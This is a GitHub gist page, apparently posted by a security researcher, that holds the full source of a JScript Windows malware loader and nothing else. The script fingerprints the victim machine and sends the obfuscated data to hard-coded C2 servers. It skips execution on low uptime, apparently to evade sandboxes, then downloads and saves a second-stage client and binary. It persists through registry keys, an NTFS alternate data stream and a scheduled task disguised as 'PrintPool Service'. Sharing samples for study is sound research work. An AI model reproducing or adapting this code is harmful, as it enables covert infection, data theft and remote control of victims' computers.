Skip to content

Instantly share code, notes, and snippets.

@JohnHammond

JohnHammond/c2_loaded_registry.js Secret

Created January 29, 2021 15:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save JohnHammond/f03d191d50c9e04cf154c27c6b4dd336 to your computer and use it in GitHub Desktop.
Save JohnHammond/f03d191d50c9e04cf154c27c6b4dd336 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
c2_loaded_registry.js
var config = {
PRIMARY_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
SOFT_SIG : 'mad24',
SOFT_VERSION: 30,
C2_REQUEST_SLEEP : 21,
C2_FAIL_SLEEP : 21,
C2_FAIL_COUNT : 20,
C2_OB_KEY : 'JxTRG4mY',
C2_PREFIX : 'rpc.aspx'
}
var SELECTED_C2 = config.PRIMARY_C2[0];
Math.imul = function (a, b) {
var ah = (a >>> 16) & 0xffff;
var al = a & 0xffff;
var bh = (b >>> 16) & 0xffff;
var bl = b & 0xffff;
return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
var GlobalStrings = {
REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
WMIC_EXEC : "wmic process call create \"%path%\"",
TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
NTFILE_PATH : "C:\\Users\\Public\\prnjobs.data",
ADS_SSID : "SyncSvc",
PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\explorer.js",
TASK_NAME : "PrintPool Service"
}
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
MAIN_SH_OBJECT : 'WScript.Shell',
STREAM_ACCESS_OBJECT : 'ADODB.Stream',
XML_TREE_OBJECT : 'Microsoft.XMLDOM',
XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};
ObjectProducer.GetRootConstructor = function(){
return ActiveXObject;
}
ObjectProducer.GetInstance = function(instanceKey){
var rootConstructor = ObjectProducer.GetRootConstructor();
return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
var DataTools = {};
DataTools.KEY_BASE = 1029;
DataTools.DeriveKey = function(keyStr){
var keyBase = DataTools.KEY_BASE;
var key = 0;
for(var i = 0; i < keyStr.length; i++){
keyBase = keyBase ^ keyStr.charCodeAt(i);
}
var _keyBase = keyBase.toString();
for(var i = 0; i < _keyBase.length; i++){
key += parseInt(_keyBase.charAt(i));
}
return key;
}
DataTools.RotString = function(str, key){
var rotd = "";
for(var i = 0; i < str.length; i++){
rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
}
return rotd;
}
DataTools.Hash = function(str){
for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
return ((h ^ h >>> 16) >>> 0).toString(16);
}
DataTools.Random = {};
DataTools.Random.Number = function(min, max){
min = Math.ceil(min);
max = Math.floor(max);
return Math.floor(Math.random() * (max - min + 1)) + min;
}
DataTools.Random.String = function(len){
var alphabet = "qwertyuiopasdfghjklzxcvbnm";
var result = "";
for(var i = 0; i < len; i++){
var chr = DataTools.Random.Number(0, alphabet.length-1);
result = result.concat(alphabet.charAt(chr));
}
return result;
}
DataTools.Strings = {};
DataTools.Strings.ParseTemplate = function(str, templateStr){
var template = templateStr.split('&');
for(var i = 0; i < template.length; i++){
var keyValue = template[i].split('=');
str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
}
return str;
}
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
Windows.Execute = function(command){
Windows.CoMainObject.Run(command);
}
Windows.GetEnv = function(env){
return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
Windows.RegRead = function(path){
return Windows.CoMainObject.RegRead(path);
}
Windows.RegWrite = function(entry, value){
Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
Windows.CreateFile = function(path){
var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
fHandle.WriteLine(DataTools.Random.String(1024));
fHandle.Close();
}
Windows.AppendDataStream = function(path, stream, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
fHandle.WriteLine(data);
fHandle.Close();
}
Windows.AppendDataStreamB = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}
Windows.WriteData = function(path, data){
var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
fHandle.Write(data);
fHandle.Close();
}
Windows.WriteBytes = function(path, data){
data.SaveToFile(path, 2);
data.Close();
}
Windows.WriteDataStreamBytes = function(path, stream, data){
data.SaveToFile(path.concat(":").concat(stream), 2);
data.Close();
}
Windows.ReadFile = function(path){
var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
return fHandle.ReadAll();
}
Windows.GetWMIProvider = function(pcname){
return GetObject("winmgmts:"+
"{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
Windows.GetUptime = function(){
var wmi = Windows.GetWMIProvider(".");
var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
var e = new Enumerator(queryResult);
return parseInt(e.item().SystemUpTime);
}
Windows.GetArch = function(){
var architecture = "64";
var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
if(product.indexOf('Windows 7') != -1){
architecture = "32";
}
return architecture;
}
var Http = {};
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
Http.Request = function(url){
try{
Http.Client.Open('GET', url, false);
Http.Client.Send();
if(Http.Client.Status == 200)
return Http.Client.ResponseText;
else
return "";
}catch(e){
return ""
}
}
var Loader = {};
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
Loader.Uptime = Windows.GetUptime();
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
Loader.GetUid = function(){
return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}
Loader.GetInitialRequest = function(nonce){
var uid = Loader.GetUid();
var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
var sessionKey = nonce + config.C2_OB_KEY;
request = request.join(":");
request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
request = Base64Encode(request);
return encodeURIComponent(request);
}
Loader.GetInitialEndpoint = function(){
var nonce = DataTools.Random.String(12)
var request = Loader.GetInitialRequest(nonce);
var endpoint = "/" + config.C2_PREFIX + "?ctl=KeepAlive&regclid=" + request + "&forcedRedirect=" + DataTools.Random.String(12) + "&header=" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
return endpoint;
}
Loader.DeployHost = function(){
var temp = Windows.GetEnv("%temp%");
var architecture = Windows.GetArch();
var nonce = DataTools.Random.String(12);
var uid = Loader.GetUid();
var sessionKey = nonce + config.C2_OB_KEY;
var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
encodedId = Base64Encode(encodedId);
encodedId = encodeURIComponent(encodedId);
var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture);
pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
var filename = uid.concat(".bin");
Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
return temp.concat("\\").concat(filename);
}
Loader.DeployClient = function() {
if (Loader.Uptime <= 3000) {
WScript.Quit(0);
}
for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
for (var j = 0; j < config.PRIMARY_C2.length; j++) {
try {
var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
if (response.indexOf('<<<CLIENT__') !== -1) {
var client = response.replace('<<<CLIENT__', '');
client = Base64text(client);
Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
Windows.RegWrite("SetupServiceKey", Loader.GetUid());
SELECTED_C2 = config.PRIMARY_C2[j];
Loader.Persist(client);
return;
}
} catch (e) {
}
WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
}
}
}
Loader.Persist = function(client){
var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
Windows.Execute(taskCommand);
Windows.RegWrite("ServerUrl", client);
Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
Windows.CreateFile(GlobalStrings.NTFILE_PATH);
Windows.WriteData("C:\\Users\\Public\\explorer.js", client);
Loader.DeployHost();
}
function debug(message){
ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
function Base64text(string){
var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
var element = XmlDOM.createElement("tempContainer");
element.dataType = "bin.Base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);
stream.Position = 0;
stream.Type = 2;
stream.CharSet = "utf-8";
return stream.ReadText();
}
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2;
BinaryStream.CharSet = "ascii";
BinaryStream.Open();
BinaryStream.WriteText(string);
BinaryStream.Position = 0;
BinaryStream.Type = 1;
BinaryStream.Position = 0;
return BinaryStream.Read();
}
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);
return stream;
}
function Base64Encode(string) {
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.nodeTypedValue = StringToBinary(string);
return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
Loader.DeployClient();
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment